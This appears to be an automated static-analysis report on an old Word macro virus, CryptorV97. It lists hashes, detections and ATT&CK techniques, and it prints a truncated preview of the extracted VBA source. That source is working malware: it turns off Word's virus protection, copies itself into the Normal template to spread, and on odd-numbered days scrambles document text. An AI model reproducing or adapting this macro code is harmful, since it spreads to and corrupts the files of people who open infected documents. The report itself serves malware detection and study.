Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ca30d46409f5067…

MALICIOUS

Office (OLE)

63.0 KB Created: 1998-05-01 15:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 08f9a0e42d4997b61a38cdffd6a1232d SHA-1: 59ee4777ffa576a480c9cb8e0f90f0e3be062b10 SHA-256: 1ca30d46409f5067bafcc40fff95a8fcdc972f75eeb138af9ee64ddc262c1241
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose functions, which are indicative of macro-based malware. The macros attempt to copy themselves to the Normal.dot template and obfuscate document content by replacing characters, suggesting an attempt to establish persistence and potentially hide malicious payloads. The presence of legacy WordBasic macro virus markers and ClamAV detection further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.ZMK-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.ZMK-5
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28216 bytes
SHA-256: 880342108389b10007f2a98cd1fd4bd15a9577dd138778edcf7c9ab249e9d15d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "CryptorV97"
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAO
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0) = "CryptorV97" Then
        CryptorV97Installed = -1
    End If
Next i
If Not CryptorV97Installed Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="CryptorV97", Object:=wdOrganizerObjectProjectItems
    MsgBox "Attention, modèle normal crypté ????", vbCritical, "Virus CryptorV97"
End If
ErrorAO:
End Sub
Sub AutoClose()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAC
Dim MyDate
MyDate = Date
D$ = Mid(MyDate, 1, 2)
Select Case D$
    Case "01", "03", "05", "07", "09", "11", "13", "15", "17", "19", "21", "23", "25", "27", "29", "31"
Selection.WholeStory
StatusBar = "Cryptage du document en cours..., HAHAHAHAHA!!!!!"
For i = 1 To 500000
Next i
With Selection.Find
        .Text = "a"
        .Replacement.Text = "@"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "b"
        .Replacement.Text = Chr$(1)
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "c"
        .Replacement.Text = Chr$(8)
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "d"
        .Replacement.Text = "("
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "e"
        .Replacement.Text = "+"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "f"
        .Replacement.Text = "$"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "g"
        .Replacement.Text = "="
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "h"
        .Replacement.Text = "-"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "i"
        .Replacement.Text = "}"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "j"
        .Replacement.Text = "ç"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "k"
        .Replacement.Text = "#"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "l"
        .Replacement.Text = "\"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "m"
        .Replacement.Text = "/"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "n"
        .Replacement.Text = "~"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "o"
        .Replacement.Text = "^"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "p"
        .Replacement.Text = "]"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "q"
        .Replacement.Text = "°"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "r"
        .Replacement.Text = "²"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "s"
        .Replacement.Text = "&"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "t"
        .Replacement.Text = "|"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
   
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.